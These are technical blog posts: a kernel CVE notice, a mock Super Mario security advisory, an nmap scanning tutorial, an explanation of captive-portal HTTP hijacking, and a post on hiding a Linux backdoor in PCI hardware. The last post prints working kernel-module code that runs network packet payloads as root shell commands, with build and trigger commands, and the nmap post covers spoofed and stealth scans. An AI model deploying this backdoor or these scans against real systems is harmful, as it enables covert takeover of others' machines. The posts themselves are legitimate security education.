Thursday Aug 08, 2013

CVE-2013-2224: Denial of service in sendmsg().

In September 2012, CVE-2012-3552 was reported: a bug that could allow an attacker to corrupt slab memory, leading to a denial of service or possibly privilege escalation, depending on the target machine's workload.  The bug had originally been fixed in the mainline kernel in April 2011, with a fairly large patch for a security fix.  The Red Hat backport of this fix introduced a new bug, assigned CVE-2013-2224, which again could allow a denial of service or possibly privilege escalation.  Rack911 & Tortoiselabs created a reproducer in June 2013 that allows an unprivileged user to cause a denial of service.

Red Hat has not yet released a kernel with this CVE fixed, but CentOS has released a custom kernel with the vendor fix for CentOS 6.

We have just released a Ksplice update to address this issue for releases 5 and 6 of Oracle Linux, Red Hat Enterprise Linux, CentOS and Scientific Linux.  We recommend that all users of Ksplice on these distributions install this zero-downtime update.


Thursday Mar 31, 2011

Security Advisory: Plumber Injection Attack in Bowser's Castle

Advisory Name: Plumber Injection Attack in Bowser's Castle
Release Date:
Product: Bowser's Castle
Affected Versions: Super Mario Bros., Super Mario Bros.: The Lost Levels
Advisory URL:

Vulnerability Overview

Multiple versions of Bowser's Castle are vulnerable to a plumber injection attack. An Italian plumber could exploit this bug to bypass security measures (walk through walls) in order to rescue Peach, to defeat Bowser, or for unspecified other impact.


This vulnerability is demonstrated by "happylee-supermariobros,warped.fm2". Attacks using this exploit have been observed in the wild, and multiple other exploits are publicly available.

Affected Versions

Versions of Bowser's Castle as shipped in Super Mario Bros. and Super Mario Bros.: The Lost Levels are affected.


An independently developed patch is available:

--- a/smb.asm   1985-09-13 12:00:00.000000000 +0900
+++ b/smb.asm   2011-04-01 12:00:00.000000000 -0400
@@ -12009,12015 +12009,12015 @@
         ldy $04
         cpy #$05
         bcc *+$09
-        lda $45
+        lda #$01
         sta $00
         jmp $df4b
         jsr $dec4

A binary hot patch to apply the update to an existing version is also available.

All users are advised to upgrade.


For users unable to apply the recommended fix, a number of mitigations are possible to reduce the impact of the vulnerability.


Potential mitigations include:


The vulnerability was originally discovered by Mario and Luigi, of Mario Bros. Security Research.

The provided patch and this advisory were prepared by Lakitu Cloud Security, Inc. The hot patch was developed in collaboration with Ksplice, Inc.

Product Overview

Bowser's Castle is King Bowser's home and the base of operations for the Koopa Troop. Bowser's Castle is the final defense against assaults by Mario to kidnap Princess Peach, and is guarded by Bowser's most powerful minions.


Monday Feb 21, 2011

Mapping your network with nmap

If you run a computer network, be it home WiFi or a global enterprise system, you need a way to investigate the machines connected to your network. When ping and traceroute won't cut it, you need a port scanner.

nmap is the port scanner. It's a powerful, sophisticated tool, not to mention a movie star. The documentation on nmap is voluminous: there's an entire book, with a free online edition, as well as a detailed manpage. In this post I'll show you just a few of the cool things nmap can do.

The law and ethics of port scanning are complex. A network scan can be detected by humans or automated systems, and treated as a malicious act, resulting in real costs to the target. Depending on the options you choose, the traffic generated by nmap can range from "completely innocuous" to "watch out for admins with baseball bats". A safe rule is to avoid scanning any network without the explicit permission of its administrators — better yet if that's you.

You'll need root privileges on the scanning system to run most interesting nmap commands, because nmap likes to bypass the standard network stack when synthesizing esoteric packets.

A firm handshake

Let's start by scanning my home network for web and SSH servers:

root@lyle# nmap -sS -p22,80
Nmap scan report for
22/tcp filtered ssh
80/tcp open     http

Nmap scan report for
22/tcp filtered ssh
80/tcp filtered http

Nmap scan report for
22/tcp open   ssh
80/tcp closed http

Nmap done: 256 IP addresses (3 hosts up) scanned in 6.05 seconds

We use -p22,80 to ask for a scan of TCP ports 22 and 80, the most popular ports for SSH and web servers respectively. If you don't specify a -p option, nmap will scan the 1,000 most commonly-used ports. You can give a port range like -p1-5000, or even use -p- to scan all ports, but your scan will take longer.

We describe the subnet to scan using CIDR notation. We could equivalently write

The option -sS requests a TCP SYN scan. nmap will start a TCP handshake by sending a SYN packet. Then it waits for a response. If the target replies with SYN/ACK, then some program is accepting our connection. A well-behaved client should respond with ACK, but nmap will simply record an open port and move on. This makes an nmap SYN scan both faster and more stealthy than a normal call to connect().

If the target replies with RST, then there's no service on that port, and nmap will record it as closed. Or we might not get a response at all. Perhaps a firewall is blocking our traffic, or the target host simply doesn't exist. In that case the port state is recorded as filtered after nmap times out.
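The decision rule described in the last two paragraphs can be written down as a small sketch. This is not nmap's code: the function name and the string encoding of the reply flags ("SA" for SYN/ACK, "R" for RST, None for a timeout) are assumptions made for illustration only.

```python
from typing import Optional


def classify_syn_probe(reply_flags: Optional[str]) -> str:
    """Map the reply to one SYN probe onto a port state.

    reply_flags is a hypothetical summary of the TCP flags in the reply:
    "SA" for SYN/ACK, "R" or "RA" for a reset, None if nothing arrived
    before the timeout.
    """
    if reply_flags is None:
        return "filtered"      # no answer: firewall, or no such host
    flags = set(reply_flags)
    if {"S", "A"} <= flags:
        return "open"          # something is accepting connections
    if "R" in flags:
        return "closed"        # host is up, but nothing listens here
    return "filtered"          # simplification: treat anything else as filtered
```

A real scanner also has to handle retransmissions and ICMP errors, which this sketch leaves out.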

You can scan UDP ports by passing -sU. There's one important difference from TCP: Since UDP is connectionless, there's no particular response required from an open port. Therefore nmap may show UDP ports in the ambiguous state open|filtered, unless you can prod the target application into sending you data (see below).

To save time, nmap tries to confirm that a target exists before performing a full scan. By default it will send ICMP echo (the ubiquitous "ping") as well as TCP SYN and ACK packets. You can use the -P family of options to customize this host-discovery phase.

Weird packets

nmap has the ability to generate all sorts of invalid, useless, or just plain weird network traffic. You can send a TCP packet with no flags at all (null scan, -sN) or one that's lit up "like a Christmas tree" (Xmas scan, -sX). You can chop your packets into little fragments (--mtu) or send an invalid checksum (--badsum). As a network administrator, you should know if the bad guys can confuse your security systems by sending weird packets. As the manpage advises, "Let your creative juices flow".

There's a second benefit to sending weird traffic: We can identify the target's operating system by seeing how it responds to unusual situations. nmap will perform this OS detection if you specify the -O flag:

root@lyle# nmap -sS -O
Nmap scan report for
Not shown: 998 filtered ports
23/tcp   closed telnet
80/tcp   open   http
MAC Address: 00:1C:10:33:6B:99 (Cisco-Linksys)
Device type: WAP|broadband router
Running: Linksys embedded, Netgear embedded, Netgear VxWorks 5.X
Nmap scan report for
Not shown: 998 filtered ports
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 00:1F:3A:7F:7C:26 (Hon Hai Precision Ind.Co.)
Warning: OSScan results may be unreliable because we could not find
  at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows Vista|2008|7 (98%)
Nmap scan report for
All 1000 scanned ports on are closed
MAC Address: 7C:61:93:53:9F:E5 (Unknown)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:

Since the first target has both an open and a closed port, nmap has many protocol corner cases to explore, and it easily recognizes a Linksys home router. With the second target, there's no port in the closed state, so nmap isn't as confident. It guesses a Windows OS, which seems especially plausible given the open NetBIOS ports. In the last case nmap has no clue, and gives us some raw findings only. If you know the OS of the target, you can contribute this fingerprint and help make nmap even better.

Behind the port

It's all well and good to discover that port 1234 is open, but what's actually listening there? nmap has a version detection subsystem that will spam a host's open ports with data in hopes of eliciting a response. Let's pass -sV to try this out:

root@lyle# nmap -sS -sV
Nmap scan report for
Not shown: 998 closed ports
443/tcp  open  ssh     OpenSSH 5.5p1 Debian 6 (protocol 2.0)
8888/tcp open  http    thttpd 2.25b 29dec2003

nmap correctly spotted an HTTP server on non-standard port 8888. The SSH server on port 443 (usually HTTPS) is also interesting. I find this setup useful when connecting from behind a restrictive outbound firewall. But I've also had network admins send me worried emails, thinking my machine has been compromised.

nmap also gives us the exact server software versions, straight from the server's own responses. This is a great way to quickly audit your network for any out-of-date, insecure servers.

Since a version scan involves sending application-level probes, it's more intrusive and can cause more trouble. From the book:

In the nmap-service-probes included with Nmap the only ports excluded are TCP port 9100 through 9107. These are common ports for printers to listen on and they often print any data sent to them. So a version detection scan can cause them to print many pages full of probes that Nmap sends, such as SunRPC requests, help statements, and X11 probes.

This behavior is often undesirable, especially when a scan is meant to be stealthy.

Trusting the source

It's a common (if questionable) practice for servers or firewalls to trust certain traffic based on where it appears to come from. nmap gives you a variety of tools for mapping these trust relationships. For example, some firewalls have special rules for traffic originating on ports 53, 67, or 20. You can set the source port for nmap's TCP and UDP packets by passing --source-port.

You can also spoof your source IP address using -S, and the target's responses will go to that fake address. This normally means that nmap won't see any results. But these responses can affect the unwitting source machine's IP protocol state in a way that nmap can observe indirectly. You can read about nmap's TCP idle scan for more details on this extremely clever technique. Imagine making any machine on the Internet — or your private network — port-scan any other machine, while you collect the results in secret. Can you use this to map out trust relationships in your network? Could an attacker?

Bells and whistles

So that's an overview of a few cool nmap features. There's a lot we haven't covered, such as performance tuning, packet traces, or nmap's useful output modes like XML or ScRipT KIdd|3. There's even a full scripting engine with hundreds of useful plugins written in Lua.


Monday Jan 17, 2011

Coffee shop Internet access

How does coffee shop Internet access work?

wireless coffee

You pull out your laptop and type an address into the URL bar on your browser. Instead of your friendly search box, you get a page where you pay money or maybe watch an advertisement, agree to some terms of service, and are only then free to browse the web.

What is going on behind the scenes to give the coffee shop that kind of control over your packets? Let's trace an example of that process from first broadcast to last redirect and find out.

Step 1: Get our network configuration

When I first sit down and turn on my laptop, it needs to get some network information and join a wireless network.

My laptop is configured to use DHCP to request network configuration information and an IP address from a DHCP server in its Layer 2 broadcast domain.

This laptop happens to use the DHCP client dhclient. /etc/dhcp3/dhclient.conf is a sample dhclient configuration file describing, among other things, what the client will request from a DHCP server (your network manager might frob that configuration -- on my Ubuntu laptop, NetworkManager keeps a modified config at /var/run/nm-dhclient-wlan0.conf).

A DHCP negotiation happens in 4 parts:


Step 1: DHCP discovery. The DHCP client (us, in the screencap) sends a message to Ethernet broadcast address ff:ff:ff:ff:ff:ff to discover DHCP servers (Wireshark shows IP addresses in the summary view, so we see broadcast IP address 255.255.255.255). The packet includes a parameter request list with the parameters in the dhclient config file. The parameters in my /var/run/nm-dhclient-wlan0.conf are:

subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;

Step 2: DHCP offer. DHCP servers that get the discovery broadcast allocate an IP address and respond with a DHCP broadcast containing that IP address and other lease information. This is typically a simple race -- whoever gets an offer packet to the requester first wins. In our case, only MAC address 00:90:fb:17:ca:4e answers our discovery broadcast (Wireshark shows its IP address in the summary view).

Step 3: DHCP request. The DHCP client picks an offer and sends another DHCP broadcast, informing the DHCP servers of the winner and letting the losers de-allocate their reserved IP addresses.

Step 4: DHCP acknowledgment. The winning DHCP server acknowledges completion of the DHCP exchange and reiterates the DHCP lease parameters. We now have an IP address (192.168.5.87) and know the IP address of our gateway router.
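To make the parameter request list from the discovery step concrete, here is a minimal sketch of how those names turn into bytes on the wire. The function and table names are made up for illustration; the numeric codes are the standard DHCP option numbers, and option 55 is the parameter request list itself.

```python
# Standard DHCP option numbers for the names in the dhclient config above.
DHCP_OPTION_CODES = {
    "subnet-mask": 1,
    "time-offset": 2,
    "routers": 3,
    "domain-name-servers": 6,
    "host-name": 12,
    "domain-name": 15,
    "interface-mtu": 26,
    "broadcast-address": 28,
    "ntp-servers": 42,
    "netbios-name-servers": 44,
    "netbios-scope": 47,
    "domain-search": 119,
    "rfc3442-classless-static-routes": 121,
}

PARAMETER_REQUEST_LIST = 55  # option code of the request list itself


def build_parameter_request_list(names):
    """Encode option 55: one code byte, one length byte, then the codes."""
    codes = bytes(DHCP_OPTION_CODES[name] for name in names)
    return bytes([PARAMETER_REQUEST_LIST, len(codes)]) + codes
```

Calling build_parameter_request_list(["subnet-mask", "routers"]) yields the four bytes 55, 2, 1, 3, which is the form in which the request travels inside the discovery packet's options field.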

DHCP lease

Step 2: Find our gateway

We managed to get a lot done using broadcast packets, but at this point a) nobody in our broadcast domain knows our MAC address, and b) we don't know the MAC address of our gateway, so we can't get any packets routed out to the Internet. Let's fix that:


Before offering us IP address 192.168.5.87, the DHCP server (Portwell_17:ca:4e) sends an ARP request for that address, saying "Who has 192.168.5.87? If that's you, respond with your MAC address". Since nobody answers, the server can be fairly confident that the IP address is not already in use.

After getting assigned IP address 192.168.5.87, we (Apple_8f:95:3f) double-check that nobody else is using it with a few ARP requests that nobody answers. We then send a few gratuitous ARPs to let everyone know that it's ours and they should update their ARP caches.

We then make an ARP request for the MAC address corresponding to the IP address of our gateway router. Our DHCP server happens to also be our gateway router and responds, claiming the address.
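For a feel of what these ARP messages look like, here is a sketch that packs the 28-byte ARP payload for IPv4 over Ethernet. The helper names are invented for this example, and the gateway address used in the usage note is a placeholder rather than the one from the capture.

```python
import socket
import struct


def mac_bytes(mac: str) -> bytes:
    """Convert "00:23:6c:8f:95:3f" into its 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def build_arp_request(sender_mac: str, sender_ip: str, target_ip: str) -> bytes:
    """Pack an ARP "who has target_ip?" request (payload only, no Ethernet header)."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                            # hardware type: Ethernet
        0x0800,                       # protocol type: IPv4
        6,                            # hardware address length
        4,                            # protocol address length
        1,                            # opcode: request
        mac_bytes(sender_mac),
        socket.inet_aton(sender_ip),
        b"\x00" * 6,                  # target MAC: unknown, that's the question
        socket.inet_aton(target_ip),
    )
```

A request for the gateway would be build_arp_request("00:23:6c:8f:95:3f", "192.168.5.87", "192.168.5.1"), with 192.168.5.1 standing in for the real gateway address. A gratuitous ARP is the same packet with sender_ip and target_ip both set to our own address.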

Step 3: Get past the terms of service

Now that we have an IP address and know the IP address of our gateway, we should be able to send packets through our gateway and out to the Internet.

I type Google's host name into my browser's URL bar. There is no period at the end, so the local DNS resolver can't tell if this is a fully-qualified domain name. This is what happens:

DNS resolution

Looking back at the DHCP acknowledgement, as part of the lease we were given a domain name. Since the host name we typed potentially isn't fully-qualified, our local DNS resolver appends the domain name from the DHCP lease to it and tries to resolve that. When the resolution fails, it tries appending decreasingly specific parts of the DHCP domain name, finds that all of them fail, and then gives up and tries to resolve the plain host name. This works, and we get back an IP address. A whois after the fact confirms that this is Google:

jesstess@pretzel-logic:~$ whois
NetRange: -
OriginAS:       AS15169
NetName:        GOOGLE
OrgName:        Google Inc.
OrgId:          GOGL
Address:        1600 Amphitheatre Parkway
City:           Mountain View
StateProv:      CA
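
The resolver behaviour described above can be sketched as a function that lists the names to try, in order. This is an illustration of the idea, not the resolver's actual algorithm: the function name is invented, and walking all the way down to the last label of the lease domain is an assumption (real resolvers may stop earlier).

```python
from typing import List


def search_candidates(name: str, lease_domain: str) -> List[str]:
    """Names a resolver might try for `name`, most specific suffix first."""
    if name.endswith("."):
        return [name]  # trailing dot: already fully qualified, no guessing
    labels = lease_domain.strip(".").split(".")
    # Append the lease domain, then ever shorter tails of it.
    candidates = [f"{name}.{'.'.join(labels[i:])}" for i in range(len(labels))]
    candidates.append(name)  # finally, the plain name as typed
    return candidates
```

With a hypothetical lease domain of cafe.wifi.example, search_candidates("www.example.org", "cafe.wifi.example") tries www.example.org.cafe.wifi.example, then www.example.org.wifi.example, then www.example.org.example, and only then www.example.org.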

We complete a TCP handshake with that address and make an HTTP GET request for the resource we want (/). Instead of getting back an HTTP 200 and the Google home page, we receive a 302 redirect to a URL carrying the query string MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F&IpAddr=192%2e168%2e5%2e87&vsgpId=a45946c6%2d737a%2d11dd%2d8436%2d0090fb2004bc&vsgId=93196&UserAgent=&ProxyHost=:

TCP handshake + HTTP

Our MAC address and IP address are conveniently encoded in the redirect URL.
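Decoding that query string takes only the standard library. The sketch below uses just the MacAddr, IpAddr and vsgId fields from the redirect; the function name is made up for the example.

```python
from urllib.parse import parse_qs

# Part of the query string from the 302 redirect above.
REDIRECT_QUERY = (
    "MacAddr=00%3a23%3a6C%3a8F%3a95%3a3F"
    "&IpAddr=192%2e168%2e5%2e87"
    "&vsgId=93196"
)


def client_identity(query: str):
    """Return the (MAC, IP) pair the gateway embedded in the redirect."""
    fields = parse_qs(query)  # percent-decodes %3a to ":" and %2e to "."
    return fields["MacAddr"][0], fields["IpAddr"][0]
```

client_identity(REDIRECT_QUERY) gives back the laptop's MAC address and leased IP address in their usual colon and dot notation.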

So what is going on here? Why didn't we get back the Google home page?

Our DHCP server/router is capturing our HTTP traffic and redirecting it to a special landing page. We don't get to make it out to Google until we finish playing a game with the coffee shop.

Let's dwell on this for a moment, because it's kind of amazing that the way the Internet is designed, our gateway router can hijack our HTTP requests and we can't stop it. In this case, we can see that the URL has changed in our browser after the redirect, but if a malicious gateway were transparently proxying our HTTP requests to an evil malware-laden clone of the site we asked for, we'd have no way to notice because there wouldn't be a redirect and the URL wouldn't change.

Worrisome? Definitely, if you're trusting a gateway with sensitive information. If you don't want to have to trust your gateway, you have to use point-to-point encryption: HTTPS, SSH, your favorite IPSec or SSL VPN, etc. And then hope there aren't bugs in your secure protocol's implementation.

Well, ain't nothing to it but to do a DNS lookup on the host name in the redirect and make our request there:


nmd is a host in the domain from our DHCP lease, so our local resolver's rules manage to resolve it in one try, and we get back an IP address. This is incidentally the IP address of the DHCP Server Identifier we received with our DHCP lease.

We try our HTTP GET request again there and get back an HTTP 200 and a landing page (still not the Google home page), which the browser renders.

The landing page has some ads and terms of service, and a button to click that we're told will grant us Internet access. That click generates an HTTP POST:


Step 4: Get to Google

Now that we have agreed to the terms of service, the landing-page server tells our gateway router that our MAC address (which was passed in the redirect URL) should be added to a whitelist, and our traffic shouldn't be captured and redirected anymore -- our HTTP packets should be allowed out onto the Internet. It responds to our POST with a final HTTP 302 redirect, this time to a different page. We do a final DNS lookup, make our HTTP GET, and get served an HTTP 200 and a webpage with some ads enticing us to level up our coffee addiction. We now have real Internet access and can get to Google.
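The gateway's side of this game amounts to a MAC whitelist check on every HTTP request. Here is a toy model of that logic; the class, its method names and the landing URL are all hypothetical, and a real gateway does this in its packet-filtering layer rather than in Python.

```python
class CaptiveGateway:
    """Toy model of a gateway that redirects HTTP until terms are accepted."""

    def __init__(self, landing_url: str):
        self.landing_url = landing_url
        self.allowed_macs = set()

    def accept_terms(self, mac: str) -> None:
        """Called once the landing page reports that this client clicked through."""
        self.allowed_macs.add(mac.lower())

    def handle_http(self, mac: str, requested_url: str):
        """Forward whitelisted clients; send everyone else to the landing page."""
        if mac.lower() in self.allowed_macs:
            return ("forward", requested_url)
        return ("redirect", self.landing_url)
```

Before accept_terms is called for our MAC address, every handle_http call comes back as a redirect to the landing page; afterwards the same request is forwarded untouched.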

And that's the story! This ability to hijack HTTP traffic at a gateway until terms are met has over the years facilitated a huge industry based around private WiFi networks at coffee shops, airports, and hotels.

It is also a reminder about just how much control your gateway, or a device pretending to be your gateway, has when you use insecure protocols. Upside-down-ternet is a playful example of exploiting the trust in your gateway, but bogus DNS resolution or transparently proxying requests to malicious sites makes use of this same principle.


Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
{
	/* Run the packet payload as a shell command line, as root. */
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};

	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	kfree_skb(skb);
	return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1
};

int init_module(void)
{
	/* inet_add_protocol() returns a negative value on failure. */
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let's build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.
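To see what such a packet looks like byte for byte, here is a sketch that builds the IPv4 header and payload by hand. It only constructs the bytes; it doesn't send anything. The function names, the TTL of 64 and the zero identification field are choices made for this example, not a description of what sendip emits.

```python
import socket
import struct


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum of the header's 16-bit words, inverted."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_packet(src: str, dst: str, command: bytes, protocol: int = 163) -> bytes:
    """Build a 20-byte IPv4 header followed by a null-terminated command."""
    payload = command + b"\x00"  # exec_packet relies on this terminator

    def header(checksum: int) -> bytes:
        return struct.pack(
            "!BBHHHBBH4s4s",
            0x45,                # version 4, header length 5 words
            0,                   # type of service
            20 + len(payload),   # total length
            0,                   # identification
            0,                   # flags and fragment offset
            64,                  # TTL (arbitrary choice)
            protocol,            # our unused protocol number
            checksum,
            socket.inet_aton(src),
            socket.inet_aton(dst),
        )

    # The checksum is computed over the header with its checksum field zeroed.
    return header(ipv4_checksum(header(0))) + payload
```

The protocol number ends up in byte 9 of the header, which is the field the kernel uses to index inet_protos.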

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.

We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.
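The same search can be done in a few lines of Python, which has the advantage of also reporting where in the image each string lives. This is a rough stand-in for the strings pipeline rather than an exact equivalent: the function name is invented, and only printable ASCII from space to tilde counts as part of a string.

```python
import re


def long_strings(image: bytes, min_len: int = 180):
    """Return (offset, text) for every printable-ASCII run of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(image)]
```

Run over the contents of the decompressed kernel image, each hit's offset says where a candidate message sits and the length of its text says how much room it offers.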

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.
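The 5-byte figure matches the size of an x86 near jump with a 32-bit displacement: opcode 0xE9 followed by a little-endian offset measured from the end of the instruction. Assuming that is the encoding in play, a sketch of computing it (with invented function names) looks like this:

```python
def encode_jmp_rel32(jump_at: int, target: int) -> bytes:
    """Encode `jmp target` as placed at address jump_at (opcode E9 + rel32)."""
    # The displacement is relative to the address of the *next* instruction.
    displacement = target - (jump_at + 5)
    return b"\xe9" + displacement.to_bytes(4, "little", signed=True)


def apply_patch(image: bytes, offset: int, patch: bytes) -> bytes:
    """Return a copy of image with patch written over the bytes at offset."""
    return image[:offset] + patch + image[offset + len(patch):]
```

A jump placed at 0x1000 that should land at 0x2000 needs a displacement of 0xFFB, so it encodes as e9 fb 0f 00 00.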

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines an "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.
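As a small illustration of the sector layout, the sketch below pulls a sector out of a raw disk image and checks the first one for the 0x55 0xAA boot signature that a BIOS conventionally expects in the last two bytes of a master boot record. The signature check is not discussed above and is included only as an example; the function names are made up.

```python
SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xaa"  # conventional marker in bytes 510-511 of an MBR


def read_sector(disk_image: bytes, lba: int) -> bytes:
    """Return sector number lba (0-based) of a raw disk image."""
    start = lba * SECTOR_SIZE
    return disk_image[start:start + SECTOR_SIZE]


def looks_bootable(disk_image: bytes) -> bool:
    """True if sector 0 is complete and ends with the boot signature."""
    mbr = read_sector(disk_image, 0)
    return len(mbr) == SECTOR_SIZE and mbr[510:512] == BOOT_SIGNATURE
```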

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

